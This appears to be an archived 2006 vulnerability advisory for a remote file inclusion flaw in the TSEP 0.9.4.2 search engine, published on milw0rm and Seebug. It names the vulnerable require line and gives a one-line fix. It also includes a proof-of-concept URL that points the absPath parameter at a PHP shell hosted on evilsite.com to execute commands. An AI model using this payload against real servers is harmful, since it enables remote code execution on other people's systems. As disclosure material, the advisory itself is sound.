+-------------------------------------------------------------------- + + TSEP 0.9.4.2 + +-------------------------------------------------------------------- + + Affected Software .: TSEP 0.9.4.2 + Venedor ...........: http://www.tsep.info/ + Class .............: Remote File Inclusion + Risk ..............: high (Remote File Execution) + Found by ..........: Philipp Niedziela + Original advisory .: http://www.bb-pcsecurity.de/ + Contact ...........: webmaster[at]bb-pcsecurity[.]de + +-------------------------------------------------------------------- + + Code /include/copyright.php: + + ..... + <?php require ( $tsep_config["absPath"]."/include/tsepversion.txt" ); ?> + ..... + +-------------------------------------------------------------------- + + $tsep_config["absPath"] is not properly sanitized before being used + +-------------------------------------------------------------------- + + Solution: + Include config-File in copyright.php + +-------------------------------------------------------------------- + + PoC: + Place a PHPShell on a remote location: + http://evilsite.com/include/tsepversion.txt + + http://[target]/include/copyright.php?tsep_config[absPath]=http://evilsite.com?cmd=ls + +-------------------------------------------------------------------- + + Greets: + Krini Gonzales (5 YEARS :P) + +-------------------------[ E O F ]---------------------------------- # milw0rm.com [2006-08-01]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论